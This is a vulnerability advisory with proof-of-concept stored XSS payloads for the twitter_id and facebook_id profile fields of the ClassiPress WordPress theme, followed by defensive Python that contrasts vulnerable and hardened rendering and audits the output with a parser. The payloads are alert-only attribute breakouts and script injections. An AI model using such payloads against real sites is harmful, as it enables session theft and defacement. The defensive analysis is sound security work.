Proof-of-Concept Code:
-------------------------
Insertion page: http://www.example.com/author/profile/
Infected page : http://www.example.com/author/attacker_username/
Note: Some sites replace "author" with another path; this is not a vanilla configuration, however.

Version: ClassiPress 3.0.5.2
Vulnerable Input Parameters:
twitter_id:  " onmouseover="alert('XSS');
facebook_id: " onmouseover="alert('XSS');
Alternate Exploit code:
twitter_id:  "><script>alert('XSS');</script><div id="
facebook_id: "><script>alert('XSS');</script><div id="

Version: ClassiPress 3.1.4
Vulnerable Input Parameters:
twitter_id:  " onmouseover='alert("XSS");'><
facebook_id: " onmouseover='alert("XSS");'><
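The payloads above all work the same way: the profile field is written into a quoted HTML attribute (the href of a social-profile link) without output encoding, so a leading double quote closes the attribute and the rest of the value becomes a new attribute or a new tag. The following Python is an added example written for this advisory, not code from ClassiPress or from the advisory author. It contrasts the insecure rendering pattern with a hardened one (allow-list validation on save plus attribute-context escaping on output) and includes a small parser-based audit check that reports whether rendered markup contains anything beyond the single intended link. The handle allow-list, the profile base URLs and the renderer functions are assumptions for illustration; the three payloads are the ones listed in the advisory, embedded as constructed sample inputs.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample inputs: the twitter_id / facebook_id values listed in the
# advisory above (they are identical for both fields).
PAYLOADS = [
    "\" onmouseover=\"alert('XSS');",
    "\"><script>alert('XSS');</script><div id=\"",
    "\" onmouseover='alert(\"XSS\");'><",
]

# Assumed allow-list for a social-media handle (not the theme's own rule):
# letters, digits, underscore and dot, 1 to 50 characters.
HANDLE_RE = re.compile(r"[A-Za-z0-9_.]{1,50}")

# Assumed profile URL prefixes used by the hypothetical renderer.
PROFILE_BASE = {
    "twitter": "https://twitter.com/",
    "facebook": "https://www.facebook.com/",
}


def render_link_vulnerable(service, handle):
    """Insecure pattern: raw user input dropped into an attribute context."""
    return f'<a href="{PROFILE_BASE[service]}{handle}">{service}</a>'


def validate_handle(handle):
    """Return the stripped handle if it matches the allow-list, else None."""
    handle = handle.strip()
    return handle if HANDLE_RE.fullmatch(handle) else None


def render_link_escaped_only(service, handle):
    """Output encoding alone: html.escape(quote=True) encodes & < > " and ',
    which removes every way of terminating a quoted attribute value."""
    return (f'<a href="{PROFILE_BASE[service]}{html.escape(handle, quote=True)}">'
            f'{html.escape(service)}</a>')


def render_link_hardened(service, handle):
    """Defence in depth: reject anything outside the allow-list, and still
    escape on output. Returns '' when the input is rejected."""
    safe = validate_handle(handle)
    if safe is None:
        return ""
    return render_link_escaped_only(service, safe)


class _TagCollector(HTMLParser):
    """Collects (tag, attrs) pairs so the audit can inspect real parse results
    instead of searching for substrings (an escaped payload still contains the
    text 'onmouseover=' but no such attribute)."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def has_injected_markup(rendered):
    """True if the rendered fragment contains any tag other than the one
    expected <a> element, or that element carries attributes beyond href."""
    parser = _TagCollector()
    parser.feed(rendered)
    parser.close()
    for tag, attrs in parser.tags:
        if tag != "a" or set(attrs) != {"href"}:
            return True
    return False


def audit(payloads=PAYLOADS):
    """Run each payload through the vulnerable and hardened renderers and
    return (vulnerable_hits, hardened_hits)."""
    vulnerable_hits = sum(has_injected_markup(render_link_vulnerable("twitter", p))
                          for p in payloads)
    hardened_hits = sum(has_injected_markup(render_link_hardened("twitter", p))
                        for p in payloads)
    return vulnerable_hits, hardened_hits


if __name__ == "__main__":
    for p in PAYLOADS:
        print("vulnerable:", render_link_vulnerable("twitter", p))
        print("hardened  :", repr(render_link_hardened("twitter", p)))
    print("hits (vulnerable, hardened):", audit())
```

In a WordPress theme the same two layers map onto validating the field on save (an allow-list such as the one above, rather than only `sanitize_text_field()`, which leaves quotes intact) and escaping on output with `esc_url()` or `esc_attr()` wherever the stored handle is placed inside an attribute.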